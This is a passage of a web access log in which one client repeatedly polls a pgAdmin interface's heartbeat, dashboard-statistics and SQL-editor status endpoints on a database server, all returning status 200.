AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:16:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:17:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:17:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:18:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:18:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:19:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:19:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:20:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:20:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:21:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:21:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:21:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:22:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:22:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:23:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:23:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:24:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:24:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:25:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:25:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:26:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:26:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:26:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:27:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:27:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:28:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:28:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:29:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:29:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:30:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:30:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:31:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:31:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:31:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:32:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:32:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:33:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:33:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:34:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:34:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:35:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:35:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:36:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:36:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:36:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/cleanup" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:37:55 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:37:55 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:38:13 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:38:13 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:38:13 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:38:15 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:38:15 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=" [Client 84.1.26.27] [Length 2] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:38:17 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:38:18 +0000] - 200 200 - POST https db.profibot.hu "/settings/save_application_state" [Client 84.1.26.27] [Length 90] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:38:19 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:38:20 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:38:21 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:38:23 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:38:25 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:38:25 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:38:27 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:38:29 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:38:30 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:38:31 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:38:33 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:38:35 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:38:35 +0000] - 200 200 - POST https db.profibot.hu "/misc/heartbeat/log" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:38:35 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:38:37 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:38:39 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:38:40 +0000] - 200 200 - GET https db.profibot.hu "/dashboard/dashboard_stats/2?chart_names=session_stats,tps_stats,ti_stats,to_stats,bio_stats" [Client 84.1.26.27] [Length 271] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/browser/" +[29/Jan/2026:12:38:41 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://db.profibot.hu/sqleditor/panel/3857941?is_query_tool=true&sgid=1&sid=2&did=16384&database_name=service_finder" +[29/Jan/2026:12:38:43 +0000] - 200 200 - GET https db.profibot.hu "/sqleditor/status/3857941" [Client 84.1.26.27] [Length 156] [Gzip -] [Sent-to pgadmin_ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 